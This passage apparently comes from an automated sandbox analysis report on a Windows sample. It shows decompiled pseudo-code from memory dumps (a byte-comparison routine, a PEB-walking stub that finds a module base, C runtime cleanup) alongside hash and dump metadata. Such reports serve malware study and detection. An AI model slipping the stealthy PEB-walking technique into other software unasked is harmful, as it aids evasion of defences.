                                        										}
                                        										_t184 =  *(_t322 - 4);
                                        										if(_t184 ==  *(_t278 - 4)) {
                                        											_t228 = 0;
                                        											L76:
                                        											if(_t228 == 0) {
                                        												_t228 = 0;
                                        											}
                                        											goto L78;
                                        										}
                                        										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                        										if(_t281 == 0) {
                                        											L69:
                                        											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                        											if(_t283 == 0) {
                                        												L71:
                                        												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                        												if(_t285 == 0) {
                                        													L73:
                                        													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                        													if(_t228 != 0) {
                                        														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L76;
                                        												}
                                        												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                        												if(_t228 != 0) {
                                        													goto L78;
                                        												}
                                        												goto L73;
                                        											}
                                        											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                        											if(_t228 != 0) {
                                        												goto L78;
                                        											}
                                        											goto L71;
                                        										}
                                        										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L69;
                                        									}
                                        									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                        									if(_t287 == 0) {
                                        										L58:
                                        										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                        										if(_t289 == 0) {
                                        											L60:
                                        											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                        											if(_t291 == 0) {
                                        												L62:
                                        												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                        												if(_t228 != 0) {
                                        													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L65;
                                        											}
                                        											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                        											if(_t228 != 0) {
                                        												goto L78;
                                        											}
                                        											goto L62;
                                        										}
                                        										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L60;
                                        									}
                                        									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L58;
                                        								}
                                        								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                        								if(_t293 == 0) {
                                        									L47:
                                        									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                        									if(_t295 == 0) {
                                        										L49:
                                        										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                        										if(_t297 == 0) {
                                        											L51:
                                        											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                        											if(_t228 != 0) {
                                        												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L54;
                                        										}
                                        										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L51;
                                        									}
                                        									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L49;
                                        								}
                                        								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L47;
                                        							}
                                        							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                        							if(_t299 == 0) {
                                        								L36:
                                        								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                        								if(_t301 == 0) {
                                        									L38:
                                        									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                        									if(_t303 == 0) {
                                        										L40:
                                        										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                        										if(_t228 != 0) {
                                        											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L43;
                                        									}
                                        									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L40;
                                        								}
                                        								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L38;
                                        							}
                                        							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L36;
                                        						}
                                        						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                        						if(_t305 == 0) {
                                        							L25:
                                        							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                        							if(_t307 == 0) {
                                        								L27:
                                        								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                        								if(_t309 == 0) {
                                        									L29:
                                        									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                        									if(_t228 != 0) {
                                        										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L32;
                                        								}
                                        								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L29;
                                        							}
                                        							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L27;
                                        						}
                                        						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L25;
                                        					}
                                        					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                        					if(_t311 == 0) {
                                        						L14:
                                        						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                        						if(_t313 == 0) {
                                        							L16:
                                        							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                        							if(_t315 == 0) {
                                        								L18:
                                        								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                        								if(_t228 != 0) {
                                        									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L21;
                                        							}
                                        							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L18;
                                        						}
                                        						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L16;
                                        					}
                                        					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                        					if(_t228 != 0) {
                                        						goto L78;
                                        					}
                                        					goto L14;
                                        				}
                                        				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        				if(_t317 == 0) {
                                        					L3:
                                        					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                        					if(_t319 == 0) {
                                        						L5:
                                        						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                        						if(_t321 == 0) {
                                        							L7:
                                        							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                        							if(_t228 != 0) {
                                        								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        							}
                                        							goto L10;
                                        						}
                                        						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L7;
                                        					}
                                        					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                        					if(_t228 != 0) {
                                        						goto L78;
                                        					}
                                        					goto L5;
                                        				}
                                        				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                        				if(_t228 != 0) {
                                        					goto L78;
                                        				}
                                        				goto L3;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: 52b9d8ba8b044fab51d1297b6e8a235508c946e5dfcbefbe253f91b3a9c275b7
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: 8FC13F322051930ADFAD463EA67453FBAE15BA27B131A076DD8B2CF1D6EF20D524F610
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                        • Instruction ID: bac217d9e25402a10fb0373ee4a54644f0ed991e796c24be71eebe5f1933b975
                                        • Opcode Fuzzy Hash: e643de11c9a7a3b8f77e7df90059e9f175bcee2aa11d033e8018bcf56453dcfc
                                        • Instruction Fuzzy Hash: 9EB16E71610609DFD759CF28C48ABA47BE0FF06364F298658E8D9CF2A1C735D992CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                        • Instruction ID: fa66c24c5dba49d23e168985a7fa55f1bcc3990672d7c6f6d64b8c5bbfbcedc1
                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                        • Instruction Fuzzy Hash: 895180B3E54A214BD3188F09CC40635B792FFC8312B5F81BEDD199B357CA74E9529A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35229ecd8b391b6edf349c230a59ff92bea9a6eb38f83f1c4e2a32eecfbbb86f
                                        • Instruction ID: 25437689b068510503fb060d0e6486b04f94b1c1d2c37d7baf6e18bc8dae2235
                                        • Opcode Fuzzy Hash: 35229ecd8b391b6edf349c230a59ff92bea9a6eb38f83f1c4e2a32eecfbbb86f
                                        • Instruction Fuzzy Hash: A951A1B3E14A214BD318CF09CC40675B792FFC8312B5F81BEDD1A8B357CA74A9529A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                        • Instruction ID: f1c78aa35e407c8ad89a59c9ad6ac791c2e22cb69b8b36c7dacfa93a795c738d
                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                        • Instruction Fuzzy Hash: 8E3162116597F14DD31E436D08BDA75AEC18E5720174EC2FEDADA6F2F3C4888408D3A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b5b1a4ebcdce08b187fabe9f23a6af89c5637d0724540729631bca78482fa05
                                        • Instruction ID: 14cbd32419ad58fd598892e7d4e2ac0ffe2acced946dc9ef98706778f55a4029
                                        • Opcode Fuzzy Hash: 9b5b1a4ebcdce08b187fabe9f23a6af89c5637d0724540729631bca78482fa05
                                        • Instruction Fuzzy Hash: 82E01236264609AFC754CBA8CC81D96B3E8EB19364B144394FD15C73A1D734ED009A50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                        • Instruction ID: 95bfa37467f99688d5aa656d66fedb345dcd5c7430edd9f2d0ac97e0929a787e
                                        • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                        • Instruction Fuzzy Hash: 9EE04F322105509BC7619B59C940CDBFBE9FB887B0B054665E94997611D330FC40D690
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
                                        • Instruction ID: 9b532fc03834e230ab2133a155e220b5fc53f65f05a4210431d0e37db4cefe1c
                                        • Opcode Fuzzy Hash: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
                                        • Instruction Fuzzy Hash: 64E04631000648EFDF216FA4CE89AC83B69EF40381F108624FD489B122CF35DE42CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
                                        • Instruction ID: edbeea8e5c6fb71a69e4ec0f3e4306e3e624e4c01aab7cdbfdcf77d98798730a
                                        • Opcode Fuzzy Hash: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
                                        • Instruction Fuzzy Hash: 1EC0123364510006C2285D1C6C853A0F738D7A3238E45A792E845D7151C182C4958188
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                        • Instruction ID: 74fc0706d39a7bc634382559c14bd00d220f343a0a708aa946c05706e07cdea6
                                        • Opcode Fuzzy Hash: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                        • Instruction Fuzzy Hash: 45C04C70A451585BDB0889799E127EA76988305211F1402BD780FC2244E55E591055A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                        • Instruction ID: 467d06f9c49a0941c72f71f005456f060fe8b90e1924536a966f2d3b50cc12fe
                                        • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                        • Instruction Fuzzy Hash: 2EB092606165804AEB6683248419B4676E0AB40B41F8994E0E00582D81C25C89889100
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000A7A20() {
                                        
                                        				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                        			}




                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0009197C(void* __eax, void* __ebx) {
                                        				intOrPtr _t5;
                                        				intOrPtr _t6;
                                        				intOrPtr _t7;
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void* _t14;
                                        				void* _t24;
                                        				intOrPtr* _t25;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t39;
                                        
                                        				_t14 = __ebx;
                                        				__imp__DecodePointer( *0xf1b34);
                                        				_t25 =  *0xefcfc; // 0x0
                                        				_t24 = __eax;
                                        				if(_t25 == 0) {
                                        					L4:
                                        					_push(_t14);
                                        					E000932B6(_t25);
                                        					_t26 =  *0xefcf8; // 0x7cee78
                                        					 *0xefcfc = 0;
                                        					if(_t26 == 0) {
                                        						L8:
                                        						E000932B6(_t26);
                                        						 *0xefcf8 = 0;
                                        						E000932B6( *0xefcf4);
                                        						_t5 = E000932B6( *0xefcf0);
                                        						_t27 = _t26 | 0xffffffff;
                                        						 *0xefcf4 = 0;
                                        						 *0xefcf0 = 0;
                                        						if(_t24 != _t27) {
                                        							_t39 =  *0xf1b34; // 0x7e48ae20
                                        							if(_t39 != 0) {
                                        								_t5 = E000932B6(_t24);
                                        							}
                                        						}
                                        						__imp__EncodePointer(_t27);
                                        						 *0xf1b34 = _t5;
                                        						_t6 =  *0xf06f4; // 0x0
                                        						if(_t6 != 0) {
                                        							E000932B6(_t6);
                                        							 *0xf06f4 = 0;
                                        						}
                                        						_t7 =  *0xf06f8; // 0x0
                                        						if(_t7 != 0) {
                                        							E000932B6(_t7);
                                        							 *0xf06f8 = 0;
                                        						}
                                        						_t8 =  *0xae7d4; // 0x7de008
                                        						asm("lock xadd [eax], esi");
                                        						if(_t27 != 1) {
                                        							L18:
                                        							return _t8;
                                        						} else {
                                        							_t8 =  *0xae7d4; // 0x7de008
                                        							if(_t8 == 0xae5b0) {
                                        								goto L18;
                                        							}
                                        							_t9 = E000932B6(_t8);
                                        							 *0xae7d4 = 0xae5b0;
                                        							return _t9;
                                        						}
                                        					}
                                        					while( *_t26 != 0) {
                                        						E000932B6( *_t26);
                                        						_t26 = _t26 + 4;
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t26 =  *0xefcf8; // 0x7cee78
                                        					goto L8;
                                        				}
                                        				while( *_t25 != 0) {
                                        					E000932B6( *_t25);
                                        					_t25 = _t25 + 4;
                                        					if(_t25 != 0) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				_t25 =  *0xefcfc; // 0x0
                                        				goto L4;
                                        			}















                                        APIs
                                        • DecodePointer.KERNEL32 ref: 00091984
                                        • _free.LIBCMT ref: 0009199D
                                          • Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
                                          • Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC
                                        • _free.LIBCMT ref: 000919B0
                                        • _free.LIBCMT ref: 000919CE
                                        • _free.LIBCMT ref: 000919E0
                                        • _free.LIBCMT ref: 000919F1
                                        • _free.LIBCMT ref: 000919FC
                                        • _free.LIBCMT ref: 00091A20
                                        • EncodePointer.KERNEL32(007CEE78), ref: 00091A27
                                        • _free.LIBCMT ref: 00091A3C
                                        • _free.LIBCMT ref: 00091A52
                                        • _free.LIBCMT ref: 00091A7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID: hn}$x|
                                        • API String ID: 3064303923-1412816383
